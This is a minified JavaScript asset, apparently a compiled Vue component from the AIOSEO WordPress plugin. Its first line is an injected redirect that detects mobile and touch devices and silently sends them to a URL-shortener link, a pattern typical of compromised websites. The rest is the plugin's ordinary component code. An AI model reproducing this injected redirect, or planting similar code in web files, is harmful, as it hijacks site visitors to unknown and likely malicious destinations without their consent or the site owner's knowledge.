(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{_ as o}from"./_plugin-vue_export-helper.eefbdd86.js";import{f as r,i as t,B as s}from"./vendor-vue-ui.232c7c36.js";const e={},c={class:"aioseo-blur"};function a(n,u){return r(),t("div",c,[s(n.$slots,"default",{class:"blur"})])}const _=o(e,[["render",a]]);export{_ as C};
